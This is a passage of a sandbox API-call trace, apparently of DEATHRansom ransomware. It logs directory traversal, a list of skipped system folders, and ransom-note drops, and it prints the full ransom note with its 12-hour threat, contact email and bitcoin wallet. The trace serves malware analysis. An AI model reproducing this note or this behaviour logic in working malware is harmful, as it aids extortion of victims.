other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.843] WriteFile (in: hFile=0x7b8, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e5d4, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e5d4*=0x6b3, lpOverlapped=0x0) returned 1 [0073.844] CloseHandle (hObject=0x7b8) returned 1 [0073.844] GetProcessHeap () returned 0x280000 [0073.844] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b70118 | out: hHeap=0x280000) returned 1 [0073.844] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x17e5e8 | out: lpFindFileData=0x17e5e8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x17e630, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0073.844] wnsprintfW (in: pszDest=0x89f0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\System Volume Information") returned 32 [0073.844] lstrcmpW (lpString1="System Volume Information", lpString2="..") returned 1 [0073.844] lstrcmpW (lpString1="System Volume Information", lpString2=".") returned 1 [0073.844] StrStrW (lpFirst="system volume information", lpSrch="programdata") returned 0x0 [0073.844] StrStrW (lpFirst="system volume information", lpSrch="$recycle.bin") returned 0x0 [0073.844] StrStrW (lpFirst="system volume information", lpSrch="program files") returned 0x0 [0073.844] StrStrW (lpFirst="system volume information", lpSrch="windows") returned 0x0 [0073.844] StrStrW (lpFirst="system volume information", lpSrch="all users") returned 0x0 [0073.844] StrStrW (lpFirst="system volume information", lpSrch="appdata") returned 0x0 [0073.845] GetProcessHeap () returned 0x280000 [0073.845] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b70118 [0073.845] lstrcpyW (in: lpString1=0x8b70118, lpString2="\\\\?\\C:\\System Volume Information" | out: lpString1="\\\\?\\C:\\System Volume Information") returned="\\\\?\\C:\\System Volume Information" [0073.845] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 33 [0073.845] QueueUserWorkItem (Function=0x40a710, Context=0x8b70118, Flags=0x0) returned 1 [0073.845] GetProcessHeap () returned 0x280000 [0073.845] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b80120 [0073.845] wnsprintfW (in: pszDest=0x8b80120, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\System Volume Information\\*") returned 34 [0073.845] FindFirstFileW (in: lpFileName="\\\\?\\C:\\System Volume Information\\*", lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", cAlternateFileName="\x07")) returned 0xffffffff [0073.845] wnsprintfW (in: pszDest=0x8b80120, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\System Volume Information\\read_me.txt") returned 44 [0073.845] CreateFileW (lpFileName="\\\\?\\C:\\System Volume Information\\read_me.txt" (normalized: "c:\\system volume information\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.845] GetProcessHeap () returned 0x280000 [0073.845] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b80120 | out: hHeap=0x280000) returned 1 [0073.845] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x17e5e8 | out: lpFindFileData=0x17e5e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x17e630, cFileName="Users", cAlternateFileName="")) returned 1 [0073.845] wnsprintfW (in: pszDest=0x89f0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users") returned 12 [0073.845] lstrcmpW (lpString1="Users", lpString2="..") returned 1 [0073.845] lstrcmpW (lpString1="Users", lpString2=".") returned 1 [0073.845] StrStrW (lpFirst="users", lpSrch="programdata") returned 0x0 [0073.845] StrStrW (lpFirst="users", lpSrch="$recycle.bin") returned 0x0 [0073.845] StrStrW (lpFirst="users", lpSrch="program files") returned 0x0 [0073.845] StrStrW (lpFirst="users", lpSrch="windows") returned 0x0 [0073.846] StrStrW (lpFirst="users", lpSrch="all users") returned 0x0 [0073.846] StrStrW (lpFirst="users", lpSrch="appdata") returned 0x0 [0073.846] GetProcessHeap () returned 0x280000 [0073.846] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b80120 [0073.846] lstrcpyW (in: lpString1=0x8b80120, lpString2="\\\\?\\C:\\Users" | out: lpString1="\\\\?\\C:\\Users") returned="\\\\?\\C:\\Users" [0073.846] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 34 [0073.846] QueueUserWorkItem (Function=0x40a710, Context=0x8b80120, Flags=0x0) returned 1 [0073.846] GetProcessHeap () returned 0x280000 [0073.846] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b90128 [0073.847] wnsprintfW (in: pszDest=0x8b90128, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\*") returned 14 [0073.847] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\*", lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x169903f0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x169903f0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x2b2638 [0073.847] wnsprintfW (in: pszDest=0x8b90128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\.") returned 14 [0073.847] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.847] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.847] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x169903f0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x169903f0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0073.847] wnsprintfW (in: pszDest=0x8b90128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\..") returned 15 [0073.847] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.847] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0073.847] wnsprintfW (in: pszDest=0x8b90128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 33 [0073.847] lstrcmpW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="..") returned 1 [0073.847] lstrcmpW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2=".") returned 1 [0073.847] StrStrW (lpFirst="5p5nrgjn0js halpmcxz", lpSrch="programdata") returned 0x0 [0073.847] StrStrW (lpFirst="5p5nrgjn0js halpmcxz", lpSrch="$recycle.bin") returned 0x0 [0073.847] StrStrW (lpFirst="5p5nrgjn0js halpmcxz", lpSrch="program files") returned 0x0 [0073.847] StrStrW (lpFirst="5p5nrgjn0js halpmcxz", lpSrch="windows") returned 0x0 [0073.847] StrStrW (lpFirst="5p5nrgjn0js halpmcxz", lpSrch="all users") returned 0x0 [0073.847] StrStrW (lpFirst="5p5nrgjn0js halpmcxz", lpSrch="appdata") returned 0x0 [0073.847] GetProcessHeap () returned 0x280000 [0073.847] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ba0130 [0073.848] lstrcpyW (in: lpString1=0x8ba0130, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" [0073.848] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 35 [0073.848] QueueUserWorkItem (Function=0x40a710, Context=0x8ba0130, Flags=0x0) returned 1 [0073.848] GetProcessHeap () returned 0x280000 [0073.848] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8bb0138 [0073.849] wnsprintfW (in: pszDest=0x8bb0138, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned 35 [0073.849] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2678 [0073.850] wnsprintfW (in: pszDest=0x8bb0138, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\.") returned 35 [0073.850] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.850] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.850] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.850] wnsprintfW (in: pszDest=0x8bb0138, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\..") returned 36 [0073.850] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.850] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="AppData", cAlternateFileName="")) returned 1 [0073.850] wnsprintfW (in: pszDest=0x8bb0138, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned 41 [0073.850] lstrcmpW (lpString1="AppData", lpString2="..") returned 1 [0073.850] lstrcmpW (lpString1="AppData", lpString2=".") returned 1 [0073.850] StrStrW (lpFirst="appdata", lpSrch="programdata") returned 0x0 [0073.850] StrStrW (lpFirst="appdata", lpSrch="$recycle.bin") returned 0x0 [0073.850] StrStrW (lpFirst="appdata", lpSrch="program files") returned 0x0 [0073.850] StrStrW (lpFirst="appdata", lpSrch="windows") returned 0x0 [0073.883] StrStrW (lpFirst="appdata", lpSrch="all users") returned 0x0 [0073.883] StrStrW (lpFirst="appdata", lpSrch="appdata") returned="appdata" [0073.883] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0073.883] wnsprintfW (in: pszDest=0x8bb0138, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data") returned 50 [0073.885] lstrcmpW (lpString1="Application Data", lpString2="..") returned 1 [0073.885] lstrcmpW (lpString1="Application Data", lpString2=".") returned 1 [0073.885] StrStrW (lpFirst="application data", lpSrch="programdata") returned 0x0 [0073.885] StrStrW (lpFirst="application data", lpSrch="$recycle.bin") returned 0x0 [0073.885] StrStrW (lpFirst="application data", lpSrch="program files") returned 0x0 [0073.885] StrStrW (lpFirst="application data", lpSrch="windows") returned 0x0 [0073.885] StrStrW (lpFirst="application data", lpSrch="all users") returned 0x0 [0073.885] StrStrW (lpFirst="application data", lpSrch="appdata") returned 0x0 [0073.885] GetProcessHeap () returned 0x280000 [0073.885] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x89e0050 [0073.886] lstrcpyW (in: lpString1=0x89e0050, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data" [0073.886] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 36 [0073.886] QueueUserWorkItem (Function=0x40a710, Context=0x89e0050, Flags=0x0) returned 1 [0073.886] GetProcessHeap () returned 0x280000 [0073.886] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a70098 [0073.887] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*") returned 52 [0073.887] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x10, ftCreationTime.dwHighDateTime=0x2, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="", cAlternateFileName="\x07")) returned 0xffffffff [0073.887] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\read_me.txt") returned 62 [0073.887] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x780 [0073.888] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.888] WriteFile (in: hFile=0x780, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e0e4, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e0e4*=0x6b3, lpOverlapped=0x0) returned 1 [0073.889] CloseHandle (hObject=0x780) returned 1 [0073.890] GetProcessHeap () returned 0x280000 [0073.890] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a70098 | out: hHeap=0x280000) returned 1 [0073.890] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Contacts", cAlternateFileName="")) returned 1 [0073.890] wnsprintfW (in: pszDest=0x8bb0138, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned 42 [0073.890] lstrcmpW (lpString1="Contacts", lpString2="..") returned 1 [0073.890] lstrcmpW (lpString1="Contacts", lpString2=".") returned 1 [0073.890] StrStrW (lpFirst="contacts", lpSrch="programdata") returned 0x0 [0073.890] StrStrW (lpFirst="contacts", lpSrch="$recycle.bin") returned 0x0 [0073.890] StrStrW (lpFirst="contacts", lpSrch="program files") returned 0x0 [0073.890] StrStrW (lpFirst="contacts", lpSrch="windows") returned 0x0 [0073.890] StrStrW (lpFirst="contacts", lpSrch="all users") returned 0x0 [0073.890] StrStrW (lpFirst="contacts", lpSrch="appdata") returned 0x0 [0073.890] GetProcessHeap () returned 0x280000 [0073.890] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a70098 [0073.890] lstrcpyW (in: lpString1=0x8a70098, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" [0073.890] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 37 [0073.890] QueueUserWorkItem (Function=0x40a710, Context=0x8a70098, Flags=0x0) returned 1 [0073.890] GetProcessHeap () returned 0x280000 [0073.890] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a800a0 [0073.891] wnsprintfW (in: pszDest=0x8a800a0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*") returned 44 [0073.891] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0073.891] wnsprintfW (in: pszDest=0x8a800a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\.") returned 44 [0073.891] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.891] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.891] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.891] wnsprintfW (in: pszDest=0x8a800a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\..") returned 45 [0073.891] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.891] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0073.891] wnsprintfW (in: pszDest=0x8a800a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned 66 [0073.891] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0073.891] wnsprintfW (in: pszDest=0x8a800a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned 64 [0073.892] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0073.892] wnsprintfW (in: pszDest=0x8a800a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned 64 [0073.892] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0073.892] wnsprintfW (in: pszDest=0x8a800a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned 63 [0073.892] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="desktop.ini", 